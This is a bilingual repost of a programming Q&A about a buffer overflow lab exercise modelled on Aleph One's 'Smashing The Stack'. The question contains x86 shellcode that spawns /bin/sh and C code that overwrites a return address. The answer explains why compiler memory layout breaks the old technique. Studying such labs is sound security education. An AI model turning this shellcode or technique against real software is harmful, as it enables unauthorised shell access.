如何写缓冲区溢出?
[英]how to write an buffer overflow?
问题描述
I've been doing buffer overflow test, mostly I read from Aleph One's Smashing The Stack For Fun And Profit. 
我一直在进行缓冲区溢出测试,主要是我从Aleph One的Smashing The Stack For Fun and Profit中读到的。
#include<string.h>
#include<stdio.h>
char shellcode[]="\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0
\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x8\x8d\x53\x0c\xcd\x80\xe8
\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x58\x58\x58\x58
\x59\x59\x59\x59";
char large_str[104]; /*length equals to buffer + i + ptr + return_address*/
int main(){
char buffer[56];/*same length as shellcode*/
int i;
long *ptr=(long*)large_str;
memset(&large_str,0,104); /*initialize large_str*/
for(i=0;i<24;i++)
*(ptr+i)=(int)buffer; /*overwrite return address*/
for(i=0;i<strlen(shellcode);i++)
large_str[i]=shellcode[i];
strcpy(buffer,large_str); /*doing overflow*/
return 0;
}
doing 在做
$gcc -o overflow -fno-stack-protector overflow.c
$./overflow
segmentation fault (core dumped)
Before doing this, I've turned random address off already. 在此之前,我已经关闭了随机地址。 Also, I've tested my shellcode in program: 另外,我已经在程序中测试了我的shellcode:
int main(int argc, char **argv)
{
int (*func)();
func=(int(*)())code;
(int)(*func)();
}
it works. 有用。 so I don't know what's wrong with my buffer overflow code, is there anyone who's got experience with buffer overflow lab? 所以我不知道我的缓冲区溢出代码出了什么问题,是否有人有缓冲区溢出实验室的经验? I debugged with gdb, it seems I didn't over write return address properly. 我使用gdb进行了调试,看来我没有正确地写回地址。
1 个解决方案
解决方案1
2 2016-11-26 09:53:14
Your code makes assumptions on where stuff like buffer will be in memory. 您的代码假设buffer东西在内存中的位置。
And what was valid for a set of compilers in 1996, from when your article is, is simply not true anymore, 20 years later in 2016. 从您撰写本文时起,对于1996年的一组编译器来说,什么才是正确的,就不再是事实了,也就是20年后的2016年。
This has nothing to do with stack protection, or address layout randomization. 这与堆栈保护或地址布局随机化无关。 It's simply that there's no reason the compiler should put the return address pointer right after your large_str – the compiler isn't stupid and sees that buffer is allocated in main , anyways, so it will just pick any location that seems convenient in memory to store buffer . 只是没有理由,编译器没有理由将返回地址指针放在您的large_str –编译器并不愚蠢,并且无论如何都会看到在main分配了buffer ,因此它只会选择在内存中似乎方便存储的任何位置buffer 。 And there's absolutely no reason to assume that this is 而且绝对没有理由认为这是
- on the stack to begin with (why should it? The compiler knows its lifetime, so it could as well be anywhere), see stack and heap are not what you think . 从堆栈开始(为什么要这样做?编译器知道其生命周期,因此它也可以在任何地方),请参见堆栈和堆不是您的想法 。
- The memory layout will be return pointer –
large_str– anything else.内存布局将是返回指针– large_str–其他任何内容。 There's nothing that defines that.没有什么可以定义的。 And there shouldn't be. 而且不应该。 It's a choice to be made by the compiler, and frankly, it probably won't make the same choice as you. 这是由编译器做出的选择,坦率地说,它可能不会与您做出相同的选择。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.